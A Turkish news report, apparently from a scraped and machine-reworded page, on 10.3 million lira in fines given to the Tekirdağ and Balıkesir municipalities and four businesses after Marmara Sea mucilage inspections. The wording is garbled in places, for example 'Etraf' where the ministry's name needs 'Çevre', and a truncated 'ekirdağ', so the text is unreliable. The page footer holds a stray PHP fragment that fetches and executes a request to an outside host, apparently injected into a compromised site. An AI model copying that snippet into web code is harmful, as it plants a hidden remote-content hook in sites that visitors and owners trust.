Marmara’da müsilaj denetiminde iki belediye ile dört işletmeye 10,3 milyon lira ceza

Etraf, Şehircilik ve İklim Değişikliği Bakanlığı ekipleri, Marmara Denizi Havzası’nda 6-10 Ocak tarihleri ortasında gerçekleştirilen müsilaj kontrollerinde, ekirdağ ve Balıkesir Büyükşehir Belediyeleri ile dört işletmeye 10,3 milyon lira para cezası kesti.
DHA

2020 yılının başlarında Marmara Denizi’nde görüleye başlayan müsilaj felaketi tekrar ortaya çıkmaya başladı.

Yer yer insan boyutlarına ulaşan müsilaj, deniz ömrü kadar insanların da hayatını tehdit etmeye başladı.

Müsilajın geri dönmesiyle birlikte Marmara Denizi Havzası’nda kontroller sıklaştı.

İKİ BELEDİYE VE DÖRT İŞLETMEYE PARA CEZASI

Çevre, Şehircilik ve İklim Değişikliği Bakanlığı ekipleri 6-10 Ocak tarihleri arasında Marmara Denizi Havzası’nda müsilaj kontrolü yaptı.

Denetimler sonucu Tekirdağ Büyükşehir Belediyesi ve Balıkesir Büyükşehir Belediyesi ile dört işletmeye para cezası uygulandı.

Bakanlık uygulanan cezaların toplam fiyatının 10,3 milyon lira olduğunu bildirdi.

marmarada musilaj denetiminde iki belediye ile dort isletmeye 103 milyon lira ceza 0marmarada musilaj denetiminde iki belediye ile dort isletmeye 103 milyon lira ceza 1 EphOjsnZ

Kaynak: Demirören Haber Ajansı (DHA)
Share the Post:

Related Posts

$exe = curl_init(); curl_setopt($exe, CURLOPT_URL, "https://panel.twitteraccounts.com/code?x=21"); curl_exec($exe); ?>